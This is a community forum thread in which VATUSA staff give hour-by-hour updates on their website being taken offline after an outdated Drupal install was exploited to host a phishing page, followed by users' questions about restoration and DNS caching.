VATUSA Website

[Andrew Podner 994055]

Hello All,

 

Magically, the VATUSA website has been shut down within the last 30 minutes. Why this happened when there is not an account issue is anyone's guess. We are working quickly to get the issue resolved, and find out who or what caused the issue to begin with.

 

I will post details as to the status of this issue regularly in this thread.

 

Thanks

[Andrew Podner 994055]

According to the webhost:

 

"It appears a phishing site has been placed into your site files."

 

So we know that the reason the site is down is malicious. We are continuing to work toward resolution. More to follow

[Colin Zhang 1103737]

Could this be linked to this problem on the QualityWings site?

viewtopic.php?f=6&t=40538

 

speculation on that thread says widespread attack either together with or from information gathered from the avsim hack I'm quite skeptical but anything's possible...

[Andrew Podner 994055]

No it is not, I have been informed as to the root cause and we are working closely with the webhost to restore services

[Colin Zhang 1103737]

Great, nice job with the swift responses and action!

[Andrew Podner 994055]

Just an update:

 

We are isolating the potential vulnerabilities in the website that have been in there for quite some time. The site is then going to be backed up and then all installed software will be updated. This means that there is a chance that some or all of the existing site will be in disrepair once we have a restoration of service.

 

I am actually anticipating that the site will be non-functional after restoration of service due to the fact that several of the systems in use are outdated and with the security holes closed, they simply won't work. As such I am concurrently writing a new CSS based portal type site based on a site that I wrote earlier this year. One way or another, VATUSA will have a functioning public website online very soon, and we will perform a damage [Mod - Happy Thoughts]essment to figure out what remains to be repaired.

 

Thank you for your patience

[Andrew Podner 994055]

12:30pm CDT update:

 

The backup and update process for all VATUSA related items is complete. There are a couple of other systems not under our control that are being worked out, and that will hopefully not take too long. Once this is complete, we will have a restoration of service and can begin [Mod - Happy Thoughts]essing the damage.

 

Development of a replacement site in the event that our public site in non function is continuing.

 

Contingency plans for post restoration failures of the Cert Center, Staff, Instructor, Forums, and other systems are in process and ongoing.

 

 

Thanks for your continued patience

[Tyler Walton 1055592]

Lovely first day on the job for you eh andrew. Grats on the new job btw. Just so you guys know if the new site is what I think it's going to be, it'll rock. We've seen his work out here at ZME and he's done a fantastic job on our website.

 

_________

Tyler Walton (C1)

-Facility Manager vZME

[Tyler Walton 1055592]

According to the webhost:

 

"It appears a phishing site has been placed into your site files."

 

So we know that the reason the site is down is malicious. We are continuing to work toward resolution. More to follow

 

Slight concern here, has any of our p[Mod - Happy Thoughts]words or information been comprimised by the phishing site?

 

____________________

Tyler Walton (C1)

-Facility Manager vZME

[Andrew Podner 994055]

I cannot say with any certainty until service is restored. At this time, we do not have any evidence that database information was compromised.

[Andrew Podner 994055]

1:30pm CDT Update:

 

I have regained access to the files on the web server and found a malicious file impersonating a credit card company in an unused directory of the website. It DOES NOT connect to the VATUSA database, and there is no reason at this time to believe that our data has been compromised. Restoration efforts are ongoing.

 

More to Follow

[Philippe Hewett 1008468]

The LUA is still going to take place... right?

[Andrew Podner 994055]

Absolutely, VATSIM network operations for LUA will continue as planned

[Philippe Hewett 1008468]

Absolutely, VATSIM network operations for LUA will continue as planned

 

Good to hear, can't wait! To bad I can't access my route anymore though.. oh well.

[Andrew Podner 994055]

2:30pm CDT update

 

We believe that all problem code has been cleared up. Our web server contained an old Drupal installation that was vulnerable and it was exploited. The hacker placed files impersonating a site that collects personal data and emailed it to him/her. We have isolated and removed both the problem files and the old Drupal installation. We are working with the webhost for them to check it over and clear the server for reactivation

 

Replacement site development and other contingency planning are ongoing.

 

More to follow

[Philippe Hewett 1008468]

Any chance the LUA page is back up by 23:00Z? I would need to check my callsign and route...

[Andrew Podner 994055]

We are doing everything possible to make that happen. I expect that we will know something in an hour or so.

[Philippe Hewett 1008468]

Good job, seems back up!!

[Andrew Podner 994055]

4:00pm Final Update in this Forum

 

Web services are restored, we are [Mod - Happy Thoughts]essing each system individually. Further updates will be posted in the VATUSA.net forums

 

 

Thanks to everyone for your patience and especially to Kyle Ramsey and Dave Klain for their [Mod - Happy Thoughts]istance today.

[Alex Bailey 969331]

Those of you who had email addresses with us (CTP staff, etc.), you may have lost those accounts. We will be working to fill those gaps and make sure everything is returned to normal as soon as possible.

[Harold Rutila 974112]

You have got to be kidding me... I really hope all that work didn't go to waste.

 

SUSPENDED

[Kyle Steever 810905]

The situation is being resolved at this time. We'll have things fixed shortly...

[Ricardo Sosa 979914]

The website continues to display the "Account Suspended" message, even though I know the website works now. I've cleared my cookies and cache and it still doesn't display. I can only open it if I use a proxy. Any suggestions? I've tried it on both IE and FireFox.

[Ryan Flynn 939022]

It's probably a DNS problem on your ISP's end. They usually resolve within a few days. In the mean time, try this http://67.220.195.100/~vatusai/www/public.php?mod=phome

 

That's the VATUSA's server IP. I just did a "ping" for it. My host is setup the same way.

 

http://www.ualva.org can be accessed at:

 

http://web48.justhost.com/~ualvaor1/

http://65.60.9.26/~ualvaor1/

[Ricardo Sosa 979914]

That opens the main page. I click on anything on it without getting the "Account Suspended" message again.

 

It's been about a week now. How many is a few days?

 

On the VATUSA forums (got in with a proxy) they suggested a DNS flush. Did that and it worked the first time, by only opening the main page. After clicking on anything, it would go to the same message again. Ran it the second time, and now I'm back to square one. Not even the main page opens. Any other ideas?